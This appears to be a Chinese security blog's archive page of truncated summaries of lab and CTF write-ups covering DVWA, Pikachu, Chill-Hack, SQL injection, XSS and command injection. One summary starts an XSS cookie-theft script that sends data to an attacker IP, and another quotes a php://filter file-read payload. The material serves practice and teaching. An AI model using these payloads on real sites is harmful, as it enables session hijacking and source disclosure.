01 2021 档案

摘要:1、先用nmap对Chill-Hack靶机进行端口扫描 扫描出了ftp、ssh、http服务 2、匿名登录ftp服务,查看ftp服务文件,有一个note.txt文件,然后下载过来 得到提示“Anurodh told me that there is some filtering on strings 阅读全文
posted @ 2021-01-30 21:01 1jzz 阅读(258) 评论(0) 推荐(0)
摘要:扫描的方式: -sP //用ping命令只对主机是否在线进行检测-sS //发送具有SYN标志的数据包,通过对主机回复的包的内容进行端口是否在线判断,没有进行tcp三次握手连接,安全性高,扫描快-sT //通过建立tcp连接进行扫描,速度较慢,而且会被目标主机记录,但是可靠性高-sU //对UPD端 阅读全文
posted @ 2021-01-30 18:13 1jzz 阅读(336) 评论(0) 推荐(0)
摘要:1、exec “ping” 查看代码: if(isset($_POST['submit']) && $_POST['ipaddress']!=null){ $ip=$_POST['ipaddress']; // $check=explode('.', $ip);可以先拆分,然后校验数字以范围,第一位 阅读全文
posted @ 2021-01-29 16:34 1jzz 阅读(131) 评论(0) 推荐(0)
摘要:1、数字型注入 查看代码: if(isset($_POST['submit']) && $_POST['id']!=null){ //这里没有做任何处理,直接拼到select里面去了,形成Sql注入 $id=$_POST['id']; $query="select username,email fr 阅读全文
posted @ 2021-01-29 02:31 1jzz 阅读(191) 评论(0) 推荐(0)
摘要:难度1-Low 查看代码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n 阅读全文
posted @ 2021-01-28 22:25 1jzz 阅读(121) 评论(0) 推荐(0)
摘要:难度1-Low 查看代码: <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); 阅读全文
posted @ 2021-01-28 15:41 1jzz 阅读(111) 评论(0) 推荐(0)
摘要:1、利用环境配置 首先在kali中开启apacha服务 sudo service apache2 start 然后在网站目录/var/www/html 下创建一个恶意js脚本 var image=new Image();image.src="http://192.168.31.155:8888/co 阅读全文
posted @ 2021-01-28 15:19 1jzz 阅读(314) 评论(0) 推荐(0)
摘要:难度1-Low 查看代码: <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>He 阅读全文
posted @ 2021-01-28 13:27 1jzz 阅读(93) 评论(0) 推荐(0)
摘要:XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWA 阅读全文
posted @ 2021-01-26 00:22 1jzz 阅读(167) 评论(0) 推荐(0)
摘要:1、验证码绕过(on-server) 先看看提示,提示说验证码好像一直有效,那么这个验证码可能只需要验证一次之后可以重复利用 查看一下后端代码: if(isset($_POST['submit'])) { if (empty($_POST['username'])) { $html .= "<p c 阅读全文
posted @ 2021-01-26 00:05 1jzz 阅读(149) 评论(0) 推荐(0)
摘要:1、修改/etc/docker/daemon.json配置文件 sudo vim /etc/docker/daemon.json 2、修改daemon.json文件的内容 { "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn"] } s 阅读全文
posted @ 2021-01-25 23:05 1jzz 阅读(5729) 评论(0) 推荐(0)
摘要:之前在用docker搭建靶场的时候出现了这个报错: Unsupported config option for services service: 'web' 后来究其原因是和需要搭建环境的docker-compose.yml配置文件中的版本和 实际上安装的版本的区别导致这个问题。 比如我当初报错的 阅读全文
posted @ 2021-01-25 22:53 1jzz 阅读(5533) 评论(0) 推荐(0)
摘要:点下面的按钮会出现这个参数,可能是sql注入 加个'试试 发现直接报错了,并且出现了includi的关键词 那么可能是文件包含,先用php://filter/read=convert.base64-encode/resource=index.php 读取index.php的页面代码看看,发现读取不成 阅读全文
posted @ 2021-01-24 22:02 1jzz 阅读(376) 评论(0) 推荐(0)
摘要:import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read 阅读全文
posted @ 2021-01-24 21:55 1jzz 阅读(203) 评论(0) 推荐(0)
摘要:代码: <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if ( 阅读全文
posted @ 2021-01-24 21:47 1jzz 阅读(230) 评论(0) 推荐(0)
摘要:robots.txt文件中存在提示 访问fAke_flagggg.php,在响应头看到见了另一个提示文件 代码分析:传入intval(num)小于2020,但是intval(num+1)要大于2021 利用科学计数法绕过,intval('3e3')=3,但是intval('3e3'+1)为3001, 阅读全文
posted @ 2021-01-24 21:35 1jzz 阅读(210) 评论(0) 推荐(0)
摘要:难度1-Low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( 阅读全文
posted @ 2021-01-23 23:03 1jzz 阅读(176) 评论(0) 推荐(0)
摘要:难度1-low 直接使用bp的Intruder模块进行密码爆破即可得出密码。 难度2-Medium 比难度1多了一个登录失败睡两秒钟的代码,所以要慢一点 难度3-High 用generateSessionToken()函数生成随机Token 在GET传参中如果存在Login变量就先对传入的user_ 阅读全文
posted @ 2021-01-23 22:29 1jzz 阅读(154) 评论(0) 推荐(0)
摘要:<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).' 阅读全文
posted @ 2021-01-23 21:09 1jzz 阅读(136) 评论(0) 推荐(0)
摘要:from random import randint import os from flag import flag N=64 key=randint(0,2**N) # print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 阅读全文
posted @ 2021-01-22 23:25 1jzz 阅读(179) 评论(0) 推荐(0)
摘要:from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q= 阅读全文
posted @ 2021-01-22 22:39 1jzz 阅读(166) 评论(0) 推荐(0)